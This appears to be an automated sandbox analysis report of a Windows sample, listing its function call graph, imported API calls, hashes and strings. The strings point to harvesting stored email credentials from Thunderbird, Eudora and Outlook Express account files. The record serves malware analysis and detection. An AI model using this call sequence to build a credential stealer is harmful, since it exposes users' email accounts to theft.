33161 40c425 _mbscat _mbscpy _mbscpy 33159->33161 33160->33161 33162 40c49d 33161->33162 33163 40c512 33162->33163 33164 40c502 GetWindowPlacement 33162->33164 33165 40c538 33163->33165 33297 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33163->33297 33164->33163 33290 409b31 33165->33290 33169 40ba28 33170 40ba87 33169->33170 33171 40ba3c 33169->33171 33300 406c62 LoadCursorA SetCursor 33170->33300 33171->33170 33174 40ba43 _mbsicmp 33171->33174 33381 40b5e5 10 API calls 33171->33381 33173 40ba8c 33301 404785 33173->33301 33304 403c16 33173->33304 33370 4107f1 33173->33370 33373 404734 33173->33373 33174->33171 33175 40baa0 33176 407e30 _strcmpi 33175->33176 33179 40bab0 33176->33179 33177 40bafa SetCursor 33177->33051 33179->33177 33180 40baf1 qsort 33179->33180 33180->33177 33674 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33185->33674 33187 40b00e 33188 40b016 33187->33188 33189 40b01f GetStdHandle 33187->33189 33675 406d1a CreateFileA 33188->33675 33191 40b01c 33189->33191 33192 40b035 33191->33192 33193 40b12d 33191->33193 33676 406c62 LoadCursorA SetCursor 33192->33676 33680 406d77 9 API calls 33193->33680 33196 40b136 33207 40c580 28 API calls 33196->33207 33197 40b087 33204 40b0a1 33197->33204 33678 40a699 12 API calls 33197->33678 33198 40b042 33198->33197 33198->33204 33677 40a57c strlen WriteFile 33198->33677 33201 40b0d6 33202 40b116 CloseHandle 33201->33202 33203 40b11f SetCursor 33201->33203 33202->33203 33203->33196 33204->33201 33679 406d77 9 API calls 33204->33679 33206->33045 33207->33048 33220 409a32 33208->33220 33211 409c80 memcpy memcpy 33212 409cda 33211->33212 33212->33211 33213 409d18 ??2@YAPAXI ??2@YAPAXI 33212->33213 33214 408db6 12 API calls 33212->33214 33216 409d54 ??2@YAPAXI 33213->33216 33218 409d8b 33213->33218 33214->33212 33216->33218 33218->33218 33230 409b9c 33218->33230 33219 4023c1 33219->33125 33221 409a44 33220->33221 33222 409a3d ??3@YAXPAX 33220->33222 33223 409a52 33221->33223 33224 409a4b ??3@YAXPAX 33221->33224 33222->33221 33225 409a63 33223->33225 33226 409a5c ??3@YAXPAX 33223->33226 33224->33223 33227 409a83 ??2@YAPAXI ??2@YAPAXI 33225->33227 33228 409a73 ??3@YAXPAX 33225->33228 33229 409a7c ??3@YAXPAX 33225->33229 33226->33225 33227->33211 33228->33229 33229->33227 33231 407a55 free 33230->33231 33232 409ba5 33231->33232 33233 407a55 free 33232->33233 33234 409bad 33233->33234 33235 407a55 free 33234->33235 33236 409bb5 33235->33236 33237 407a55 free 33236->33237 33238 409bbd 33237->33238 33239 407a1f 4 API calls 33238->33239 33240 409bd0 33239->33240 33241 407a1f 4 API calls 33240->33241 33242 409bda 33241->33242 33243 407a1f 4 API calls 33242->33243 33244 409be4 33243->33244 33245 407a1f 4 API calls 33244->33245 33246 409bee 33245->33246 33246->33219 33248 410d0e 2 API calls 33247->33248 33249 410dca 33248->33249 33250 410dfd memset 33249->33250 33280 4070ae 33249->33280 33252 410e1d 33250->33252 33253 410e7f _mbscpy 33252->33253 33283 410d3d _mbscpy 33252->33283 33255 401e9e strlen strlen 33253->33255 33255->33128 33255->33129 33257 410e5b 33284 410add RegQueryValueExA 33257->33284 33259 410e73 33259->33253 33260->33132 33261->33138 33263 401c4c 33262->33263 33264 401ca1 33263->33264 33285 410add RegQueryValueExA 33263->33285 33264->33141 33264->33142 33266 401c6a 33266->33264 33267 401c71 strchr 33266->33267 33267->33264 33268 401c85 strchr 33267->33268 33268->33264 33269 401c94 33268->33269 33286 406f06 strlen 33269->33286 33271->33129 33272->33135 33273->33149 33275 410b34 33274->33275 33277 410b4c 33275->33277 33289 410add RegQueryValueExA 33275->33289 33277->33149 33278->33149 33279->33146 33281 4070bd GetVersionExA 33280->33281 33282 4070ce 33280->33282 33281->33282 33282->33250 33282->33255 33283->33257 33284->33259 33285->33266 33287 406f17 33286->33287 33288 406f1a memcpy 33286->33288 33287->33288 33288->33264 33289->33277 33291 409b40 33290->33291 33293 409b4e 33290->33293 33298 409901 memset SendMessageA 33291->33298 33294 409b99 33293->33294 33295 409b8b 33293->33295 33294->33169 33299 409868 SendMessageA 33295->33299 33297->33165 33298->33293 33299->33294 33300->33173 33302 4047a3 33301->33302 33303 404799 FreeLibrary 33301->33303 33302->33175 33303->33302 33305 4107f1 FreeLibrary 33304->33305 33306 403c30 LoadLibraryA 33305->33306 33307 403c74 33306->33307 33308 403c44 GetProcAddress 33306->33308 33310 4107f1 FreeLibrary 33307->33310 33308->33307 33309 403c5e 33308->33309 33309->33307 33313 403c6b 33309->33313 33311 403c7b 33310->33311 33312 404734 3 API calls 33311->33312 33314 403c86 33312->33314 33313->33311 33382 4036e5 33314->33382 33317 4036e5 27 API calls 33318 403c9a 33317->33318 33319 4036e5 27 API calls 33318->33319 33320 403ca4 33319->33320 33321 4036e5 27 API calls 33320->33321 33322 403cae 33321->33322 33394 4085d2 33322->33394 33328 403cd2 33330 403cf7 33328->33330 33546 402bd1 37 API calls 33328->33546 33331 403d1c 33330->33331 33547 402bd1 37 API calls 33330->33547 33429 402c5d 33331->33429 33335 4070ae GetVersionExA 33336 403d31 33335->33336 33338 403d61 33336->33338 33548 402b22 42 API calls 33336->33548 33340 403d97 33338->33340 33549 402b22 42 API calls 33338->33549 33341 403dcd 33340->33341 33550 402b22 42 API calls 33340->33550 33441 410808 33341->33441 33345 404785 FreeLibrary 33346 403de8 33345->33346 33445 402fdb 33346->33445 33349 402fdb 29 API calls 33350 403e00 33349->33350 33457 4032b7 33350->33457 33359 403e3b 33361 403e73 33359->33361 33362 403e46 _mbscpy 33359->33362 33504 40fb00 33361->33504 33552 40f334 333 API calls 33362->33552 33371 410807 33370->33371 33372 4107fc FreeLibrary 33370->33372 33371->33175 33372->33371 33374 404785 FreeLibrary 33373->33374 33375 40473b LoadLibraryA 33374->33375 33376 40474c GetProcAddress 33375->33376 33379 40476e 33375->33379 33377 404764 33376->33377 33376->33379 33377->33379 33378 404781 33378->33175 33379->33378 33380 404785 FreeLibrary 33379->33380 33380->33378 33381->33171 33383 4037c5 33382->33383 33384 4036fb 33382->33384 33383->33317 33553 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33384->33553 33386 40370e 33386->33383 33387 403716 strchr 33386->33387 33387->33383 33388 403730 33387->33388 33554 4021b6 memset 33388->33554 33390 40373f _mbscpy _mbscpy strlen 33391 4037a4 _mbscpy 33390->33391 33392 403789 sprintf 33390->33392 33555 4023e5 16 API calls 33391->33555 33392->33391 33395 4085e2 33394->33395 33556 4082cd 11 API calls 33395->33556 33397 4085ec 33398 403cba 33397->33398 33399 40860b memset 33397->33399 33406 40821d 33398->33406 33558 410b62 RegEnumKeyExA 33399->33558 33401 408637 33401->33398 33402 40865c memset 33401->33402 33560 40848b 10 API calls 33401->33560 33561 410b62 RegEnumKeyExA 33401->33561 33559 410add RegQueryValueExA 33402->33559 33407 40823f 33406->33407 33408 403cc6 33407->33408 33409 408246 memset 33407->33409 33414 4086e0 33408->33414 33562 410b62 RegEnumKeyExA 33409->33562 33413 40826f 33413->33408 33563 4080ed 11 API calls 33413->33563 33564 410b62 RegEnumKeyExA 33413->33564 33565 4045db 33414->33565 33416 4088ef 33573 404656 33416->33573 33420 408737 wcslen 33420->33416 33421 40876a 33420->33421 33421->33416 33422 40877a wcsncmp 33421->33422 33424 404734 3 API calls 33421->33424 33425 404785 FreeLibrary 33421->33425 33426 408812 memset 33421->33426 33427 40883c memcpy wcschr 33421->33427 33428 4088c3 LocalFree 33421->33428 33576 40466b _mbscpy 33421->33576 33422->33421 33424->33421 33425->33421 33426->33421 33426->33427 33427->33421 33428->33421 33430 402c7a 33429->33430 33431 402c87 memset 33430->33431 33440 402d9a 33430->33440 33577 410b62 RegEnumKeyExA 33431->33577 33433 410b1e RegQueryValueExA 33434 402ce4 memset sprintf 33433->33434 33437 402cb2 33434->33437 33435 402d3a sprintf 33435->33437 33437->33433 33437->33435 33437->33440 33578 402bd1 37 API calls 33437->33578 33579 402bd1 37 API calls 33437->33579 33580 410b62 RegEnumKeyExA 33437->33580 33440->33335 33442 410816 33441->33442 33443 4107f1 FreeLibrary 33442->33443 33444 403ddd 33443->33444 33444->33345 33446 402ff9 33445->33446 33447 403006 memset 33446->33447 33448 403122 33446->33448 33581 410b62 RegEnumKeyExA 33447->33581 33448->33349 33450 410b1e RegQueryValueExA 33451 403058 memset sprintf 33450->33451 33456 403033 33451->33456 33452 4030a2 memset 33582 410b62 RegEnumKeyExA 33452->33582 33454 410b62 RegEnumKeyExA 33454->33456 33456->33448 33456->33450 33456->33452 33456->33454 33583 402db3 24 API calls 33456->33583 33458 4032d5 33457->33458 33459 4033a9 33457->33459 33584 4021b6 memset 33458->33584 33472 4034e4 memset memset 33459->33472 33461 4032e1 33585 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33461->33585 33463 4032ea 33464 4032f8 memset GetPrivateProfileSectionA 33463->33464 33586 4023e5 16 API calls 33463->33586 33464->33459 33469 40332f 33464->33469 33466 40339b strlen 33466->33459 33466->33469 33468 403350 strchr 33468->33469 33469->33459 33469->33466 33587 4021b6 memset 33469->33587 33588 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33469->33588 33589 4023e5 16 API calls 33469->33589 33473 410b1e RegQueryValueExA 33472->33473 33474 40353f 33473->33474 33475 40357f 33474->33475 33476 403546 _mbscpy 33474->33476 33480 403985 33475->33480 33590 406d55 strlen _mbscat 33476->33590 33478 403565 _mbscat 33591 4033f0 19 API calls 33478->33591 33592 40466b _mbscpy 33480->33592 33484 4039aa 33486 4039ff 33484->33486 33593 40f6e2 33484->33593 33609 40f460 12 API calls 33484->33609 33610 4038e8 21 API calls 33484->33610 33487 404785 FreeLibrary 33486->33487 33488 403a0b 33487->33488 33489 4037ca memset memset 33488->33489 33612 444551 memset 33489->33612 33492 4038e2 33492->33359 33551 40f334 333 API calls 33492->33551 33494 40382e 33495 406f06 2 API calls 33494->33495 33496 403843 33495->33496 33497 406f06 2 API calls 33496->33497 33498 403855 strchr 33497->33498 33499 403884 _mbscpy 33498->33499 33500 403897 strlen 33498->33500 33501 4038bf _mbscpy 33499->33501 33500->33501 33502 4038a4 sprintf 33500->33502 33621 4023e5 16 API calls 33501->33621 33502->33501 33506 40fb10 33504->33506 33505 403e7f 33514 40f96c 33505->33514 33506->33505 33507 40fb55 RegQueryValueExA 33506->33507 33507->33505 33508 40fb84 33507->33508 33509 404734 3 API calls 33508->33509 33510 40fb91 33509->33510 33510->33505 33511 40fc19 LocalFree 33510->33511 33512 40fbdd memcpy memcpy 33510->33512 33511->33505 33625 40f802 7 API calls 33512->33625 33515 4070ae GetVersionExA 33514->33515 33516 40f98d 33515->33516 33517 4045db 7 API calls 33516->33517 33525 40f9a9 33517->33525 33518 404656 FreeLibrary 33519 403e85 33518->33519 33526 4442ea memset 33519->33526 33520 40fae6 33520->33518 33521 40fa13 memset WideCharToMultiByte 33522 40fa43 _strnicmp 33521->33522 33521->33525 33523 40fa5b WideCharToMultiByte 33522->33523 33522->33525 33524 40fa88 WideCharToMultiByte 33523->33524 33523->33525 33524->33525 33525->33520 33525->33521 33527 410dbb 7 API calls 33526->33527 33528 444329 33527->33528 33626 40759e strlen strlen 33528->33626 33533 410dbb 7 API calls 33534 444350 33533->33534 33535 40759e 3 API calls 33534->33535 33536 44435a 33535->33536 33537 444212 64 API calls 33536->33537 33538 444366 memset memset 33537->33538 33539 410b1e RegQueryValueExA 33538->33539 33540 4443b9 ExpandEnvironmentStringsA strlen 33539->33540 33541 4443f4 _strcmpi 33540->33541 33542 4443e5 33540->33542 33543 403e91 33541->33543 33544 44440c 33541->33544 33542->33541 33543->33175 33545 444212 64 API calls 33544->33545 33545->33543 33546->33330 33547->33331 33548->33338 33549->33340 33550->33341 33551->33359 33552->33361 33553->33386 33554->33390 33555->33383 33557 40841c 33556->33557 33557->33397 33558->33401 33559->33401 33560->33401 33561->33401 33562->33413 33563->33413 33564->33413 33566 404656 FreeLibrary 33565->33566 33567 4045e3 LoadLibraryA 33566->33567 33568 404651 33567->33568 33569 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33567->33569 33568->33416 33568->33420 33570 40463d 33569->33570 33571 404643 33570->33571 33572 404656 FreeLibrary 33570->33572 33571->33568 33572->33568 33574 404666 33573->33574 33575 40465c FreeLibrary 33573->33575 33574->33328 33575->33574 33576->33421 33577->33437 33578->33435 33579->33437 33580->33437 33581->33456 33582->33456 33583->33456 33584->33461 33585->33463 33586->33464 33587->33468 33588->33469 33589->33469 33590->33478 33591->33475 33592->33484 33611 40466b _mbscpy 33593->33611 33595 40f6fa 33596 4045db 7 API calls 33595->33596 33597 40f708 33596->33597 33598 404734 3 API calls 33597->33598 33603 40f7e2 33597->33603 33604 40f715 33598->33604 33599 404656 FreeLibrary 33600 40f7f1 33599->33600 33601 404785 FreeLibrary 33600->33601 33602 40f7fc 33601->33602 33602->33484 33603->33599 33604->33603 33605 40f797 WideCharToMultiByte 33604->33605 33606 40f7b8 strlen 33605->33606 33607 40f7d9 LocalFree 33605->33607 33606->33607 33608 40f7c8 _mbscpy 33606->33608 33607->33603 33608->33607 33609->33484 33610->33484 33611->33595 33613 44458b 33612->33613 33616 40381a 33613->33616 33622 410add RegQueryValueExA 33613->33622 33615 4445a4 33615->33616 33623 410add RegQueryValueExA 33615->33623 33616->33492 33620 4021b6 memset 33616->33620 33618 4445c1 33618->33616 33624 444879 30 API calls 33618->33624 33620->33494 33621->33492 33622->33615 33623->33618 33624->33616 33625->33511 33627 4075c9 33626->33627 33628 4075bb _mbscat 33626->33628 33629 444212 33627->33629 33628->33627 33646 407e9d 33629->33646 33632 44424d 33633 444274 33632->33633 33634 444258 33632->33634 33654 407ef8 33632->33654 33635 407e9d 9 API calls 33633->33635 33671 444196 51 API calls 33634->33671 33643 4442a0 33635->33643 33637 407ef8 9 API calls 33637->33643 33638 4442ce 33668 407f90 33638->33668 33642 407f90 FindClose 33644 4442e4 33642->33644 33643->33637 33643->33638 33645 444212 64 API calls 33643->33645 33664 407e62 33643->33664 33644->33533 33645->33643 33647 407f90 FindClose 33646->33647 33648 407eaa 33647->33648 33649 406f06 2 API calls 33648->33649 33650 407ebd strlen strlen 33649->33650 33651 407ee1 33650->33651 33652 407eea 33650->33652 33672 4070e3 strlen _mbscat _mbscpy _mbscat 33651->33672 33652->33632 33655 407f03 FindFirstFileA 33654->33655 33656 407f24 FindNextFileA 33654->33656 33657 407f3f 33655->33657 33658 407f46 strlen strlen 33656->33658 33659 407f3a 33656->33659 33657->33658 33661 407f7f 33657->33661 33658->33661 33662 407f76 33658->33662 33660 407f90 FindClose 33659->33660 33660->33657 33661->33632 33673 4070e3 strlen _mbscat _mbscpy _mbscat 33662->33673 33665 407e6c strcmp 33664->33665 33667 407e94 33664->33667 33666 407e83 strcmp 33665->33666 33665->33667 33666->33667 33667->33643 33669 407fa3 33668->33669 33670 407f99 FindClose 33668->33670 33669->33642 33670->33669 33671->33632 33672->33652 33673->33661 33674->33187 33675->33191 33676->33198 33677->33197 33678->33204 33679->33201 33680->33196 33698 411853 RtlInitializeCriticalSection memset 33699 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33874 40a256 13 API calls 33876 432e5b 17 API calls 33878 43fa5a 20 API calls 33701 401060 41 API calls 33881 427260 CloseHandle memset memset 33705 410c68 FindResourceA SizeofResource LoadResource LockResource 33883 405e69 14 API calls 33707 433068 15 API calls __fprintf_l 33885 414a6d 18 API calls 33886 43fe6f 134 API calls 33709 424c6d 15 API calls __fprintf_l 33887 426741 19 API calls 33711 440c70 17 API calls 33712 443c71 42 API calls 33715 427c79 24 API calls 33890 416e7e memset __fprintf_l 33718 43f400 15 API calls 33719 42800b 47 API calls 33720 425115 82 API calls __fprintf_l 33893 41960c 61 API calls 33721 43f40c 122 API calls __fprintf_l 33724 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33725 43f81a 20 API calls 33727 414c20 memset memset 33728 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 33897 414625 18 API calls 33898 404225 modf 33899 403a26 strlen WriteFile 33901 40422a 12 API calls 33905 427632 memset memset memcpy 33906 40ca30 59 API calls 33907 404235 26 API calls 33730 425115 76 API calls __fprintf_l 33908 425115 77 API calls __fprintf_l 33910 44223a 38 API calls 33736 43183c 112 API calls 33911 44b2c5 _onexit __dllonexit 33916 42a6d2 memcpy __allrem 33738 405cda 60 API calls 33924 43fedc 138 API calls 33925 4116e1 16 API calls __fprintf_l 33741 4244e6 19 API calls 33743 42e8e8 127 API calls __fprintf_l 33744 4118ee RtlLeaveCriticalSection 33930 43f6ec 22 API calls 33746 425115 119 API calls __fprintf_l 33747 410cf3 EnumResourceNamesA 33933 4492f0 memcpy memcpy 33935 43fafa 18 API calls 33937 4342f9 15 API calls __fprintf_l 33748 4144fd 19 API calls 33939 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 33940 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33943 443a84 _mbscpy 33945 43f681 17 API calls 33751 404487 22 API calls 33947 415e8c 16 API calls __fprintf_l 33755 411893 RtlDeleteCriticalSection __fprintf_l 33756 41a492 42 API calls 33951 403e96 34 API calls 33952 410e98 memset SHGetPathFromIDList SendMessageA 33758 426741 109 API calls __fprintf_l 33759 4344a2 18 API calls 33760 4094a2 10 API calls 33955 4116a6 15 API calls __fprintf_l 33956 43f6a4 17 API calls 33957 440aa3 20 API calls 33959 427430 45 API calls 33763 4090b0 7 API calls 33764 4148b0 15 API calls 33766 4118b4 RtlEnterCriticalSection 33767 4014b7 CreateWindowExA 33768 40c8b8 19 API calls 33770 4118bf RtlTryEnterCriticalSection 33964 42434a 18 API calls __fprintf_l 33966 405f53 12 API calls 33778 43f956 59 API calls 33780 40955a 17 API calls 33781 428561 36 API calls 33782 409164 7 API calls 33970 404366 19 API calls 33974 40176c ExitProcess 33977 410777 42 API calls 33787 40dd7b 51 API calls 33788 425d7c 16 API calls __fprintf_l 33979 43f6f0 25 API calls 33980 42db01 22 API calls 33789 412905 15 API calls __fprintf_l 33981 403b04 54 API calls 33982 405f04 SetDlgItemTextA GetDlgItemTextA 33983 44b301 ??3@YAXPAX 33986 4120ea 14 API calls 3 library calls 33987 40bb0a 8 API calls 33989 413f11 strcmp 33793 434110 17 API calls __fprintf_l 33795 425115 108 API calls __fprintf_l 33990 444b11 _onexit 33797 425115 76 API calls __fprintf_l 33800 429d19 10 API calls 33993 444b1f __dllonexit 33994 409f20 _strcmpi 33802 42b927 31 API calls 33997 433f26 19 API calls __fprintf_l 33998 44b323 FreeLibrary 33999 427f25 46 API calls 34000 43ff2b 17 API calls 34001 43fb30 19 API calls 33809 414d36 16 API calls 33811 40ad38 7 API calls 34003 433b38 16 API calls __fprintf_l 33681 44b33b 33682 44b344 ??3@YAXPAX 33681->33682 33683 44b34b 33681->33683 33682->33683 33684 44b354 ??3@YAXPAX 33683->33684 33685 44b35b 33683->33685 33684->33685 33686 44b364 ??3@YAXPAX 33685->33686 33687 44b36b 33685->33687 33686->33687 33688 44b374 ??3@YAXPAX 33687->33688 33689 44b37b 33687->33689 33688->33689 33815 426741 21 API calls 33816 40c5c3 123 API calls 33818 43fdc5 17 API calls 34004 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33821 4161cb memcpy memcpy memcpy memcpy 34009 43ffc8 18 API calls 34011 4383cc 110 API calls __fprintf_l 33823 4275d3 41 API calls 34012 4153d3 22 API calls __fprintf_l 33824 444dd7 _XcptFilter 34017 4013de 15 API calls 34019 425115 111 API calls __fprintf_l 34020 43f7db 18 API calls 34023 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33827 4335ee 16 API calls __fprintf_l 34025 429fef 11 API calls 33828 444deb _exit _c_exit 34026 40bbf0 133 API calls 33831 425115 79 API calls __fprintf_l 34030 437ffa 22 API calls 33835 4021ff 14 API calls 33836 43f5fc 149 API calls 34031 40e381 9 API calls 33838 405983 40 API calls 33839 42b186 27 API calls __fprintf_l 33840 427d86 76 API calls 33841 403585 20 API calls 33843 42e58e 18 API calls __fprintf_l 33846 425115 75 API calls __fprintf_l 33848 401592 8 API calls 32884 410b92 32887 410a6b 32884->32887 32886 410bb2 32888 410a77 32887->32888 32889 410a89 GetPrivateProfileIntA 32887->32889 32892 410983 memset _itoa WritePrivateProfileStringA 32888->32892 32889->32886 32891 410a84 32891->32886 32892->32891 34035 434395 16 API calls 33850 441d9c memcmp 34037 43f79b 119 API calls 33851 40c599 42 API calls 34038 426741 87 API calls 33855 4401a6 21 API calls 33857 426da6 memcpy memset memset memcpy 33858 4335a5 15 API calls 33860 4299ab memset memset memcpy memset memset 33861 40b1ab 8 API calls 34043 425115 76 API calls __fprintf_l 34047 4113b2 18 API calls 2 library calls 34051 40a3b8 memset sprintf SendMessageA 32893 410bbc 32896 4109cf 32893->32896 32897 4109dc 32896->32897 32898 410a23 memset GetPrivateProfileStringA 32897->32898 32899 4109ea memset 32897->32899 32904 407646 strlen 32898->32904 32909 4075cd sprintf memcpy 32899->32909 32902 410a0c WritePrivateProfileStringA 32903 410a65 32902->32903 32905 40765a 32904->32905 32907 40765c 32904->32907 32905->32903 32906 4076a3 32906->32903 32907->32906 32910 40737c strtoul 32907->32910 32909->32902 32910->32907 33863 40b5bf memset memset _mbsicmp

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                      • String ID: ACD
                                                                                                                                                      • API String ID: 379999529-620537770
                                                                                                                                                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                                                                      • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                      • API String ID: 3833278029-4223776976
                                                                                                                                                      • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                      • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                      Strings
